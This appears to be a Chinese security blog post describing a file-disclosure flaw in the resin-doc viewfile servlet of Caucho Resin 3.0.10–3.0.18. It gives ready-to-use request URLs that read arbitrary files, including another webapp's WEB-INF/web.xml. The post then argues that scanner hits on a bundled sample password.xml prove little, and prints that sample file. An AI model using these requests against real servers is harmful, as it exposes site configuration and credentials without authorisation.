起风网Finger (Save water. Shower with your girlfriend.) | 2014-01-13 12:04 受影响系统: Caucho Technology Resin v3.0.18 Caucho Technology Resin v3.0.17 Caucho Technology Resin v3.0.16 Caucho Technology Resin v3.0.15 Caucho Technology Resin v3.0.14 Caucho Technology Resin v3.0.13 Caucho Technology Resin v3.0.12 Caucho Technology Resin v3.0.11 Caucho Technology Resin v3.0.10 默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
http://localhost/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight viewfile servlet
可以无需参数在Web主目录中浏览任意文件: http://localhost/resin-doc/viewfile/?file=index.jsp 请注意这句话: 攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件: http://localhost/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml 描器扫出来的这些,证明不了什么 http://localhost/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml http://localhost/resin-doc/examples/security-basic/viewfile?file=password.xml examples = 例子 有人可能会觉得读出password.xml了,是敏感信息,下面是我刚 下载的resin内resin-doc\examples\security-basic\WEB-INF\password.xml文件的内容,可以和大家读到的对比下。 这个文件只是examples! <!-- password.xml -->
<authenticator>
<!-- professors -->
<user name='snape' password='I7HdZr7CTM6hZLlSd2o+CA==' roles='professor,slytherin'/>
<user name='mcgonagall' password='4slsTREVeTo0sv5hGkZWag==' roles='professor,gryffindor'/>
<!-- students -->
<user name='harry' password='uTOZTGaB6pooMDvqvl2Lbg==' roles='student,gryffindor'/>
<user name='dmalfoy' password='yI2uN1l97Rv5E6mdRnDFwQ==' roles='student,slytherin'/>
<!-- alumni -->
<user name='lmalfoy' password='sj/yhtU1h4LZPw7/Uy9IVA==' roles='alumni,gryffindor'/>
</authenticator>
|
-
- 上一篇: TOM邮箱核心功能存储型XSS – 网站安全 – 自学php
- 下一篇: 21CN邮箱存储型XSS – 网站安全 – 自学php
评论前必须登录!
立即登录